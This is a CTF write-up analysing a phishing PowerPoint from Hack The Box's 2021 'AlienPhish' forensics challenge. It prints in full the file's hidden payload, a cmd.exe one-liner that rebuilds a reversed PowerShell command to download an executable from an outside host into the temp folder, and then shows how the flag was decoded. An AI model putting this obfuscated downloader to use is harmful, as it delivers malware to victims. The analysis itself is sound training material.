Hack The Box’s Cyber Apocalypse 2021 CTF— AlienPhish — Write-up
My colleagues are I took part in the 5-day CTF by HTB in April ’21, where every challenge solved raises some donation to a good cause.
I picked the “AlienPhish” challenge from the “Forensics” section because we were the first team who solved that (and thereby gaining the full 1000 points; points decrease with the number of solves).
This is the original challenge:
Unpacking the downloaded zip package, we get “Alien Weaknesses.pptx”. I submitted it to VT since it was not targetted or part of my corporate work (if you would like to download the sample, you can here): https://www.virustotal.com/gui/file/00abacd6fe8f37d21983c84c0fceb9bf56af8b2ab39a19798b7f773c8d032db0/detection
There were no AV detections on my machine as well, since it was not a known file yet; the detections came in 2 days after.
Once I’ve unzipped the pptx, I loaded the folder in Sublime.
g ~ % unzip Alien\ Weaknesses.pptx
Archive: /Alien Weaknesses.pptx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: ppt/slides/_rels/slide1.xml.rels
inflating: ppt/_rels/presentation.xml.rels
inflating: ppt/presentation.xml
inflating: ppt/slides/slide1.xml
inflating: ppt/slideLayouts/_rels/slideLayout5.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout8.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout10.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout11.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout9.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout6.xml.rels
inflating: ppt/slideMasters/_rels/slideMaster1.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout1.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout2.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout3.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout7.xml.rels
inflating: ppt/slideLayouts/slideLayout11.xml
inflating: ppt/slideLayouts/slideLayout10.xml
inflating: ppt/slideLayouts/slideLayout3.xml
inflating: ppt/slideLayouts/slideLayout2.xml
inflating: ppt/slideLayouts/slideLayout1.xml
inflating: ppt/slideMasters/slideMaster1.xml
inflating: ppt/slideLayouts/slideLayout4.xml
inflating: ppt/slideLayouts/slideLayout5.xml
inflating: ppt/slideLayouts/slideLayout6.xml
inflating: ppt/slideLayouts/slideLayout7.xml
inflating: ppt/slideLayouts/slideLayout8.xml
inflating: ppt/slideLayouts/slideLayout9.xml
inflating: ppt/slideLayouts/_rels/slideLayout4.xml.rels
inflating: ppt/theme/theme1.xml
extracting: ppt/media/image1.png
extracting: ppt/media/image2.png
extracting: docProps/thumbnail.jpeg
inflating: ppt/presProps.xml
inflating: ppt/tableStyles.xml
inflating: ppt/viewProps.xml
inflating: docProps/app.xml
inflating: docProps/core.xmlWe know where the payload would be, since we’ve seen it on the preview.
The payload presented is:
Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22"The string “eliftuo” stood out, so I googled it and found the following page where a method of reversing strings was mentioned:
That made sense. rwi meant iwr and ptth meant http. Once the string was reversed, it was a lot clearer:
We see the malicious executable Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe.
Doing a base64 decoding gets us the flag, CHTB{pH1sHiNg_w0_m4cr0s???}!
